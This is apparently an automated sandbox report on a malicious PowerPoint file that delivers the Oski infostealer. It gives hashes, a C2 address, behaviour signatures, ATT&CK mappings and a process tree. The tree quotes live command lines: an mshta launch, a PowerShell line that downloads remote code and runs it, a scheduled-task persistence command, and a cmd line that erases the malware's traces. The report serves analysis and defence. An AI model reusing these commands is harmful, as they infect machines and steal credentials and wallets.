Analysis

  • max time kernel
    69s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    14-07-2021 07:43

General

  • Target

    Drawing for Our New Order.ppt

  • Size

    61KB

  • MD5

    79493748bb0077dcef55330b23a575f8

  • SHA1

    03b6a4e65c92aafd4b1ca0b1c136480b05a3f4be

  • SHA256

    38d2d19379a2972893b4e72762478cfb3323f1c6d56b50787e25ff4eb96a2f05

  • SHA512

    7126d9fdb489eb259001917d2f6e4999789e6db9d61a752f65fe1652d97f04db0ff8f1652d8f865cbb86199fa16e7b34c83e8b3daadb1fd631716160c50ee540

Malware Config

Extracted

Family

oski

C2

103.153.76.164/we/div/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Drawing for Our New Order.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:308
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2028
      • C:\Windows\SysWOW64\mshta.exe
        mshta https://bitly.com/wdjasewquidbnas
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1160
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 ;i'E'x(iwr('https://ia801508.us.archive.org/9/items/qw_20210713/divine.txt') -useB)
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1620
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:1468
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1468 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe & RD /S /Q C:\\ProgramData\\244139639178950\\* & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:516
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /pid 1468
                6⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2020
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""https://randikhanaekminar.blogspot.com/p/divine111.html"
          3⤵
          • Creates scheduled task(s)
          PID:1364

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      MD5

      2902de11e30dcc620b184e3bb0f0c1cb

      SHA1

      5d11d14a2558801a2688dc2d6dfad39ac294f222

      SHA256

      e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

      SHA512

      efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      d12cfb03e6cd7041bf073862cf5e4ae5

      SHA1

      10c8166c9f5a2ccb780ca9086c65272a60686ead

      SHA256

      6d971bb46678d300072057fc276907cf3dcaf8fe772bf017bd9f6af674a24ad1

      SHA512

      4b7e56df4d1f27399247f7fb2d6ef7599637ad67442f25526ee26f411e4c65728cb4c5a7b352f917a8522361e4905b294d528123d22b43a609fd45c89d776d18

    • \ProgramData\mozglue.dll
      MD5

      8f73c08a9660691143661bf7332c3c27

      SHA1

      37fa65dd737c50fda710fdbde89e51374d0c204a

      SHA256

      3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

      SHA512

      0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

    • \ProgramData\msvcp140.dll
      MD5

      109f0f02fd37c84bfc7508d4227d7ed5

      SHA1

      ef7420141bb15ac334d3964082361a460bfdb975

      SHA256

      334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

      SHA512

      46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

    • \ProgramData\nss3.dll
      MD5

      bfac4e3c5908856ba17d41edcd455a51

      SHA1

      8eec7e888767aa9e4cca8ff246eb2aacb9170428

      SHA256

      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

      SHA512

      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

    • \ProgramData\sqlite3.dll
      MD5

      e477a96c8f2b18d6b5c27bde49c990bf

      SHA1

      e980c9bf41330d1e5bd04556db4646a0210f7409

      SHA256

      16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

      SHA512

      335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

    • \ProgramData\vcruntime140.dll
      MD5

      7587bf9cb4147022cd5681b015183046

      SHA1

      f2106306a8f6f0da5afb7fc765cfa0757ad5a628

      SHA256

      c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

      SHA512

      0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

    • memory/308-61-0x0000000071CC1000-0x0000000071CC3000-memory.dmp
      Filesize

      8KB

    • memory/308-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/308-64-0x0000000075A31000-0x0000000075A33000-memory.dmp
      Filesize

      8KB

    • memory/308-60-0x0000000074C31000-0x0000000074C35000-memory.dmp
      Filesize

      16KB

    • memory/516-106-0x0000000000000000-mapping.dmp
    • memory/1160-66-0x0000000000000000-mapping.dmp
    • memory/1364-68-0x0000000000000000-mapping.dmp
    • memory/1468-98-0x000000000040717B-mapping.dmp
    • memory/1468-97-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/1468-100-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/1620-96-0x0000000001C30000-0x0000000001C33000-memory.dmp
      Filesize

      12KB

    • memory/1620-83-0x0000000006090000-0x0000000006091000-memory.dmp
      Filesize

      4KB

    • memory/1620-92-0x00000000062C0000-0x00000000062C1000-memory.dmp
      Filesize

      4KB

    • memory/1620-93-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/1620-75-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

    • memory/1620-74-0x00000000025C0000-0x00000000025C1000-memory.dmp
      Filesize

      4KB

    • memory/1620-78-0x0000000006020000-0x0000000006021000-memory.dmp
      Filesize

      4KB

    • memory/1620-72-0x0000000004840000-0x0000000004841000-memory.dmp
      Filesize

      4KB

    • memory/1620-84-0x0000000006230000-0x0000000006231000-memory.dmp
      Filesize

      4KB

    • memory/1620-91-0x00000000061B0000-0x00000000061B1000-memory.dmp
      Filesize

      4KB

    • memory/1620-73-0x0000000004842000-0x0000000004843000-memory.dmp
      Filesize

      4KB

    • memory/1620-71-0x0000000004880000-0x0000000004881000-memory.dmp
      Filesize

      4KB

    • memory/1620-70-0x0000000002130000-0x0000000002131000-memory.dmp
      Filesize

      4KB

    • memory/1620-67-0x0000000000000000-mapping.dmp
    • memory/2020-107-0x0000000000000000-mapping.dmp
    • memory/2028-65-0x000007FEFC661000-0x000007FEFC663000-memory.dmp
      Filesize

      8KB

    • memory/2028-63-0x0000000000000000-mapping.dmp